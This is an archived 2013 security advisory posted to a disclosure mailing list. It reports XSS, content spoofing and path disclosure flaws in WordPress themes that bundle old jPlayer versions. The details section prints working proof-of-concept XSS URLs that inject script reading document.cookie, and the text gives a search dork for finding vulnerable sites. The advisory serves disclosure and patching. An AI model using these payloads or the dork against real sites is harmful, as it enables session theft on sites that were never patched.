Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <008701ce412d$c8ac6c80$9b7a6fd5@pc>
Date: Wed, 24 Apr 2013 23:52:39 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>,
	<full-disclosure@...ts.grok.org.uk>,
	"1337 Exploit DataBase" <mr.inj3ct0r@...il.com>,
	"Open Source Security" <oss-security@...ts.openwall.com>
Subject: Vulnerabilities in multiple themes for WordPress with jPlayer

Hello list!

I want to inform you about multiple vulnerabilities in multiple themes for 
WordPress with jPlayer. These are Cross-Site Scripting, Content Spoofing and 
Full path disclosure vulnerabilities.

I've wrote about vulnerabilities in jPlayer earlier 
(http://seclists.org/fulldisclosure/2013/Apr/192). jPlayer is used in 
multiple web applications and particularly in multiple plugins (as I've 
wrote earlier) and themes for WordPress. And in WP themes even more then in 
plugins - there are many thousands of vulnerable themes (these are free, 
commercial and custom themes). Plus there are many web sites which placed 
Jplayer.swf in other folders besides plugins and themes. Google dork for 
jPlayer shows 32000 results and for WP themes with it shows 313000 
(inurl:Jplayer.swf inurl:/wp-content/themes/).

Among them are Studiozen, Photocrati, Music, Imperial Fairytale and 
Feather12. And thousands of other themes (see Google dork). All developers 
of these themes, the same as developers of all other web applications with 
jPlayer, need to update it in their software.

-------------------------
Affected products:
-------------------------

All versions of Studiozen, Photocrati, Music, Imperial Fairytale and 
Feather12 themes.

Vulnerabilities are in jPlayer versions before 2.2.23. Version 2.2.23 and 
the last released version 2.3.0 are not vulnerable to mentioned XSS, except 
CS via JS and XSS via JS callbacks. Also there are other bypass methods 
which work in version 2.3.0, but the developers haven't fixed them besides 
attack via alert. About that I've wrote to developers already in March and 
reminded again. So wait for new version with fixing of these 
vulnerabilities.

----------
Details:
----------

Cross-Site Scripting (WASC-08):

In different versions of jPlayer there are different XSS vulnerabilities 
(see in the first advisory) and different WP themes has different versions 
of jPlayer.

Studiozen:

http://site/wp-content/themes/studiozen/js/html5player/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

Photocrati:

http://site/wp-content/themes/photocrati-theme/scripts/Jplayer.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

Music:

http://site/wp-content/themes/music/js/Jplayer.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

Imperial Fairytale:

http://site/wp-content/themes/imperial-fairytale/assets/swf/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

Feather12:

http://site/wp-content/themes/feather12/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

http://site/wp-content/themes/feather12/js/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

Content Spoofing (WASC-12):

It's possible to conduct CS (inclusion of audio/video files from external 
resources) via JS and XSS via JS callbacks. This requires HTML Injection 
vulnerability at the site. The attack is similar to XSS attacks via 
callbacks in JW Player (http://securityvulns.ru/docs28176.html).

Because this attack vector requires separate vulnerability at target site to 
conduct CS and XSS attacks with using of jPlayer, the developers didn't do 
anything to fix it. The same as developers JW Player. So protection from 
this attack scenario lies solely on web sites owners.

Full path disclosure (WASC-13):

All mentioned themes have FPD vulnerabilities in php-files (in index.php and 
others), which is typically for WP themes.

http://site/wp-content/themes/studiozen/

http://site/wp-content/themes/photocrati-theme/

http://site/wp-content/themes/music/

http://site/wp-content/themes/imperial-fairytale/

http://site/wp-content/themes/feather12/

------------
Timeline:
------------ 

2013.03.19 - informed developers of jPlayer.
2013.04.20 - developers released jPlayer 2.3.0 
(http://www.jplayer.org/2.3.0/release-notes/) and informed me.
2013.04.21 - informed multiple developers of WordPress plugins and other 
software with jPlayer.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.